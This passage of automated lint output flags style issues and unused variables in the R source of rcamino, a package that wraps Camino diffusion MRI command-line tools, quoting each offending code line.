^\n```\n[R/camino_fsl2scheme.R:64:11:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_fsl2scheme.R#L64) *style:* **Use <-, not =, for assignment.**\n```r\n​    bvals = as.character(bvals)\n          ^\n```\n[R/camino_fsl2scheme.R:66:11:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_fsl2scheme.R#L66) *style:* **Use <-, not =, for assignment.**\n```r\n​    bvals = tfile\n          ^\n```\n[R/camino_fsl2scheme.R:69:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_fsl2scheme.R#L69) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = c(\n       ^\n```\n[R/camino_fsl2scheme.R:75:12:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_fsl2scheme.R#L75) *style:* **Use <-, not =, for assignment.**\n```r\n​  log_opts = c(\"-flipx\" = flipx,\n           ^\n```\n[R/camino_fsl2scheme.R:80:12:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_fsl2scheme.R#L80) *style:* **Use <-, not =, for assignment.**\n```r\n​  log_opts = collapse_log_opts(log_opts)\n           ^\n```\n[R/camino_fsl2scheme.R:81:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_fsl2scheme.R#L81) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = paste(opts, log_opts)\n       ^\n```\n[R/camino_fsl2scheme.R:83:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_fsl2scheme.R#L83) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = camino_cmd(\"fsl2scheme\")\n      ^\n```\n[R/camino_fsl2scheme.R:84:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_fsl2scheme.R#L84) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = paste(cmd, opts, \" > \", outfile)\n      ^\n```\n[R/camino_fsl2scheme.R:89:3:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_fsl2scheme.R#L89) *warning:* **local variable ‘res’ assigned but may not be used**\n```r\n​  res = system(cmd)\n  ^~~\n```\n[R/camino_fsl2scheme.R:89:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_fsl2scheme.R#L89) *style:* **Use <-, not =, for assignment.**\n```r\n​  res = system(cmd)\n      ^\n```\n[R/camino_help.R:10:13:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_help.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_help = function(funcname, ...){\n            ^\n```\n[R/camino_help.R:11:11:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_help.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​  man_fol = system.file(file.path(\"camino\", \"man\"), package = \"rcamino\")\n          ^\n```\n[R/camino_help.R:12:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_help.R#L12) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = sprintf(\"man -M %s %s\", man_fol, funcname)\n      ^\n```\n[R/camino_help.R:26:22:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_help.R#L26) *style:* **Use <-, not =, for assignment.**\n```r\n​read_camino_helpfile = function(funcname){\n                     ^\n```\n[R/camino_help.R:27:11:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_help.R#L27) *style:* **Use <-, not =, for assignment.**\n```r\n​  man_fol = system.file(file.path(\"camino\", \"man\", \"man1\"),\n          ^\n```\n[R/camino_help.R:29:12:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_help.R#L29) *style:* **Use <-, not =, for assignment.**\n```r\n​  funcname = paste0(funcname, \".1\")\n           ^\n```\n[R/camino_help.R:30:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_help.R#L30) *style:* **Use <-, not =, for assignment.**\n```r\n​  file = file.path(man_fol, funcname)\n       ^\n```\n[R/camino_help.R:32:9:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_help.R#L32) *style:* **Use <-, not =, for assignment.**\n```r\n​    res = readLines(file)\n        ^\n```\n[R/camino_help.R:34:9:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_help.R#L34) *style:* **Use <-, not =, for assignment.**\n```r\n​    res = NULL\n        ^\n```\n[R/camino_image2voxel.R:10:20:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_image2voxel.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_image2voxel = function(infile,\n                   ^\n```\n[R/camino_image2voxel.R:16:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_image2voxel.R#L16) *style:* **Use <-, not =, for assignment.**\n```r\n​  infile = checkimg(infile)\n         ^\n```\n[R/camino_image2voxel.R:17:18:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_image2voxel.R#L17) *style:* **Use <-, not =, for assignment.**\n```r\n​  outputdatatype = match.arg(outputdatatype)\n                 ^\n```\n[R/camino_image2voxel.R:20:13:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_image2voxel.R#L20) *style:* **Use <-, not =, for assignment.**\n```r\n​    outfile = tempfile(fileext = paste0(\".B\", outputdatatype))\n            ^\n```\n[R/camino_image2voxel.R:23:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_image2voxel.R#L23) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = c(\"-inputfile\" = shQuote(infile),\n       ^\n```\n[R/camino_image2voxel.R:26:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_image2voxel.R#L26) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = paste(names(opts), opts, collapse = \" \")\n       ^\n```\n[R/camino_image2voxel.R:28:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_image2voxel.R#L28) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = camino_cmd(\"image2voxel\")\n      ^\n```\n[R/camino_image2voxel.R:29:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_image2voxel.R#L29) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = paste(cmd, opts)\n      ^\n```\n[R/camino_image2voxel.R:33:3:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_image2voxel.R#L33) *warning:* **local variable ‘res’ assigned but may not be used**\n```r\n​  res = system(cmd)\n  ^~~\n```\n[R/camino_image2voxel.R:33:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_image2voxel.R#L33) *style:* **Use <-, not =, for assignment.**\n```r\n​  res = system(cmd)\n      ^\n```\n[R/camino_modelfit.R:42:17:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_modelfit.R#L42) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_modelfit = function(infile,\n                ^\n```\n[R/camino_modelfit.R:46:1:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_modelfit.R#L46) *style:* **lines should not be more than 80 characters.**\n```r\n​                           model = c(\"dt\", \"ldt\", \"nldt_pos\", \"nldt\", \"ldt_wtd\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/camino_modelfit.R:51:1:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_modelfit.R#L51) *style:* **lines should not be more than 80 characters.**\n```r\n​                           outputdatatype = c(\"double\", \"float\", \"char\", \"short\",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/camino_modelfit.R:63:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_modelfit.R#L63) *style:* **Use <-, not =, for assignment.**\n```r\n​  infile = checkimg(infile)\n         ^\n```\n[R/camino_modelfit.R:64:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_modelfit.R#L64) *style:* **Use <-, not =, for assignment.**\n```r\n​  mask = checkimg(mask)\n       ^\n```\n[R/camino_modelfit.R:65:17:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_modelfit.R#L65) *style:* **Use <-, not =, for assignment.**\n```r\n​  inputdatatype = match.arg(inputdatatype)\n                ^\n```\n[R/camino_modelfit.R:66:16:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_modelfit.R#L66) *style:* **Use <-, not =, for assignment.**\n```r\n​  maskdatatype = match.arg(maskdatatype)\n               ^\n```\n[R/camino_modelfit.R:67:18:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_modelfit.R#L67) *style:* **Use <-, not =, for assignment.**\n```r\n​  outputdatatype = match.arg(outputdatatype)\n                 ^\n```\n[R/camino_modelfit.R:68:9:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_modelfit.R#L68) *style:* **Use <-, not =, for assignment.**\n```r\n​  model = match.arg(model)\n        ^\n```\n[R/camino_modelfit.R:70:13:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_modelfit.R#L70) *style:* **Use <-, not =, for assignment.**\n```r\n​    outfile = tempfile(fileext = paste0(\".B\", outputdatatype))\n            ^\n```\n[R/camino_modelfit.R:73:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_modelfit.R#L73) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = c(\"-inputfile\" = shQuote(infile),\n       ^\n```\n[R/camino_modelfit.R:88:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_modelfit.R#L88) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = paste(names(opts), opts, collapse = \" \")\n       ^\n```\n[R/camino_modelfit.R:90:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_modelfit.R#L90) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = camino_cmd(\"modelfit\")\n      ^\n```\n[R/camino_modelfit.R:91:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_modelfit.R#L91) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = paste(cmd, opts)\n      ^\n```\n[R/camino_modelfit.R:95:3:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_modelfit.R#L95) *warning:* **local variable ‘res’ assigned but may not be used**\n```r\n​  res = system(cmd)\n  ^~~\n```\n[R/camino_modelfit.R:95:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_modelfit.R#L95) *style:* **Use <-, not =, for assignment.**\n```r\n​  res = system(cmd)\n      ^\n```\n[R/camino_pointset2scheme.R:9:24:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_pointset2scheme.R#L9) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_pointset2scheme = function(\n                       ^\n```\n[R/camino_pointset2scheme.R:14:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_pointset2scheme.R#L14) *style:* **Use <-, not =, for assignment.**\n```r\n​  scipen = getOption(\"scipen\")\n         ^\n```\n[R/camino_pointset2scheme.R:20:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_pointset2scheme.R#L20) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = camino_cmd(\"pointset2scheme\")\n      ^\n```\n[R/camino_pointset2scheme.R:22:13:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_pointset2scheme.R#L22) *style:* **Use <-, not =, for assignment.**\n```r\n​    outfile = tempfile(fileext = \".scheme\")\n            ^\n```\n[R/camino_pointset2scheme.R:24:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_pointset2scheme.R#L24) *style:* **Use <-, not =, for assignment.**\n```r\n​  infile = path.expand(infile)\n         ^\n```\n[R/camino_pointset2scheme.R:25:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_pointset2scheme.R#L25) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = c(\"-inputfile\" = shQuote(infile),\n       ^\n```\n[R/camino_pointset2scheme.R:28:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_pointset2scheme.R#L28) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = paste(names(opts), opts, collapse = \" \")\n       ^\n```\n[R/camino_pointset2scheme.R:30:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_pointset2scheme.R#L30) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = paste(cmd, opts)\n      ^\n```\n[R/camino_pointset2scheme.R:34:3:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_pointset2scheme.R#L34) *warning:* **local variable ‘res’ assigned but may not be used**\n```r\n​  res = system(cmd)\n  ^~~\n```\n[R/camino_pointset2scheme.R:34:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_pointset2scheme.R#L34) *style:* **Use <-, not =, for assignment.**\n```r\n​  res = system(cmd)\n      ^\n```\n[R/camino_set_heap.R:9:17:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_set_heap.R#L9) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_set_heap = function(heap_size = 4000){\n                ^\n```\n[R/camino_set_heap.R:10:5:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_set_heap.R#L10) *style:* **Commented code should be removed.**\n```r\n​  # options(\"CAMINO_HEAP_SIZE\" = heap_size)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/camino_set_heap.R:23:17:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_set_heap.R#L23) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_get_heap = function(heap_size = 4000){\n                ^\n```\n[R/camino_set_heap.R:24:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_set_heap.R#L24) *style:* **Use <-, not =, for assignment.**\n```r\n​  heap = Sys.getenv(\"CAMINO_HEAP_SIZE\")\n       ^\n```\n[R/camino_set_heap.R:26:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_set_heap.R#L26) *style:* **Use <-, not =, for assignment.**\n```r\n​    heap = heap_size\n         ^\n```\n[R/camino_set_heap.R:30:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_set_heap.R#L30) *style:* **Use <-, not =, for assignment.**\n```r\n​    heap = heap_size\n         ^\n```\n[R/camino_set_heap.R:33:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_set_heap.R#L33) *style:* **Use <-, not =, for assignment.**\n```r\n​  heap = as.numeric(heap)\n       ^\n```\n[R/camino_set_heap.R:35:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_set_heap.R#L35) *style:* **Use <-, not =, for assignment.**\n```r\n​    heap = heap_size\n         ^\n```\n[R/camino_set_heap.R:40:1:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_set_heap.R#L40) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/camino_set_heap.R:41:1:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_set_heap.R#L41) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/camino_set_heap.R:42:1:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_set_heap.R#L42) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/camino_set_heap.R:43:1:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_set_heap.R#L43) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/camino_vcthreshselect.R:19:23:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_vcthreshselect.R#L19) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_vcthreshselect = function(infile,\n                      ^\n```\n[R/camino_vcthreshselect.R:27:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_vcthreshselect.R#L27) *style:* **Use <-, not =, for assignment.**\n```r\n​  infile = checkimg(infile)\n         ^\n```\n[R/camino_vcthreshselect.R:29:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_vcthreshselect.R#L29) *style:* **Use <-, not =, for assignment.**\n```r\n​  scipen = getOption(\"scipen\")\n         ^\n```\n[R/camino_vcthreshselect.R:36:11:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_vcthreshselect.R#L36) *style:* **Use <-, not =, for assignment.**\n```r\n​    ftest = paste0(ftest, collapse = \" \")\n          ^\n```\n[R/camino_vcthreshselect.R:39:12:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_vcthreshselect.R#L39) *style:* **Use <-, not =, for assignment.**\n```r\n​  datadims = paste0(datadims, collapse = \" \")\n           ^\n```\n[R/camino_vcthreshselect.R:46:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_vcthreshselect.R#L46) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = c(\"-inputfile\" = infile,\n       ^\n```\n[R/camino_vcthreshselect.R:53:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_vcthreshselect.R#L53) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = collapse_opts(opts)\n       ^\n```\n[R/camino_vcthreshselect.R:55:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_vcthreshselect.R#L55) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = camino_cmd(\"vcthreshselect\")\n      ^\n```\n[R/camino_vcthreshselect.R:56:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_vcthreshselect.R#L56) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = paste(cmd, opts)\n      ^\n```\n[R/camino_vcthreshselect.R:60:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_vcthreshselect.R#L60) *style:* **Use <-, not =, for assignment.**\n```r\n​  res = system(cmd)\n      ^\n```\n[R/camino_vcthreshselect.R:65:1:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_vcthreshselect.R#L65) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/camino_voxel2image.R:17:20:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L17) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_voxel2image = function(infile,\n                   ^\n```\n[R/camino_voxel2image.R:28:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L28) *style:* **Use <-, not =, for assignment.**\n```r\n​  infile = checkimg(infile)\n         ^\n```\n[R/camino_voxel2image.R:29:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L29) *style:* **Use <-, not =, for assignment.**\n```r\n​  header = checkimg(header)\n         ^\n```\n[R/camino_voxel2image.R:35:19:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L35) *style:* **Use <-, not =, for assignment.**\n```r\n​    inputdatatype = match.arg(inputdatatype,\n                  ^\n```\n[R/camino_voxel2image.R:40:20:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L40) *style:* **Use <-, not =, for assignment.**\n```r\n​    outputdatatype = match.arg(outputdatatype,\n                   ^\n```\n[R/camino_voxel2image.R:45:16:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L45) *style:* **Use <-, not =, for assignment.**\n```r\n​    outputroot = tempfile(fileext = \"_\")\n               ^\n```\n[R/camino_voxel2image.R:48:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L48) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = c( \"-inputfile\" = infile,\n       ^\n```\n[R/camino_voxel2image.R:55:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L55) *style:* **Use <-, not =, for assignment.**\n```r\n​  ext = \".nii\"\n      ^\n```\n[R/camino_voxel2image.R:57:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L57) *style:* **Use <-, not =, for assignment.**\n```r\n​    opts = c(opts, \"-gzip\" = \"\")\n         ^\n```\n[R/camino_voxel2image.R:58:9:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L58) *style:* **Use <-, not =, for assignment.**\n```r\n​    ext = \".nii.gz\"\n        ^\n```\n[R/camino_voxel2image.R:61:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L61) *style:* **Use <-, not =, for assignment.**\n```r\n​    opts = c(opts, \"-outputvector\" = \"\")\n         ^\n```\n[R/camino_voxel2image.R:63:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L63) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = paste(names(opts), opts, collapse = \" \")\n       ^\n```\n[R/camino_voxel2image.R:65:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L65) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = camino_cmd(\"voxel2image\")\n      ^\n```\n[R/camino_voxel2image.R:66:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L66) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = paste(cmd, opts)\n      ^\n```\n[R/camino_voxel2image.R:70:3:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L70) *warning:* **local variable ‘res’ assigned but may not be used**\n```r\n​  res = system(cmd)\n  ^~~\n```\n[R/camino_voxel2image.R:70:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L70) *style:* **Use <-, not =, for assignment.**\n```r\n​  res = system(cmd)\n      ^\n```\n[R/camino_voxel2image.R:72:13:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L72) *style:* **Use <-, not =, for assignment.**\n```r\n​    outfile = paste0(outputroot, ext)\n            ^\n```\n[R/camino_voxel2image.R:74:13:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxel2image.R#L74) *style:* **Use <-, not =, for assignment.**\n```r\n​    outfile = paste0(outputroot, seq(components), ext)\n            ^\n```\n[R/camino_voxelclassify.R:25:22:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxelclassify.R#L25) *style:* **Use <-, not =, for assignment.**\n```r\n​camino_voxelclassify = function(infile,\n                     ^\n```\n[R/camino_voxelclassify.R:35:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxelclassify.R#L35) *style:* **Use <-, not =, for assignment.**\n```r\n​  infile = checkimg(infile)\n         ^\n```\n[R/camino_voxelclassify.R:36:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxelclassify.R#L36) *style:* **Use <-, not =, for assignment.**\n```r\n​  scipen = getOption(\"scipen\")\n         ^\n```\n[R/camino_voxelclassify.R:44:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxelclassify.R#L44) *style:* **Use <-, not =, for assignment.**\n```r\n​    mask = checkimg(mask)\n         ^\n```\n[R/camino_voxelclassify.R:47:16:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxelclassify.R#L47) *style:* **Use <-, not =, for assignment.**\n```r\n​      bgthresh = NULL\n               ^\n```\n[R/camino_voxelclassify.R:52:20:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxelclassify.R#L52) *style:* **Use <-, not =, for assignment.**\n```r\n​    outputdatatype = \"double\"\n                   ^\n```\n[R/camino_voxelclassify.R:54:22:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxelclassify.R#L54) *style:* **Use <-, not =, for assignment.**\n```r\n​      outputdatatype = \"int\"\n                     ^\n```\n[R/camino_voxelclassify.R:56:13:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxelclassify.R#L56) *style:* **Use <-, not =, for assignment.**\n```r\n​    outfile = tempfile(fileext = paste0(\".B\", outputdatatype))\n            ^\n```\n[R/camino_voxelclassify.R:60:11:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxelclassify.R#L60) *style:* **Use <-, not =, for assignment.**\n```r\n​    ftest = paste0(ftest, collapse = \" \")\n          ^\n```\n[R/camino_voxelclassify.R:67:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxelclassify.R#L67) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = c(\"-inputfile\" = infile,\n       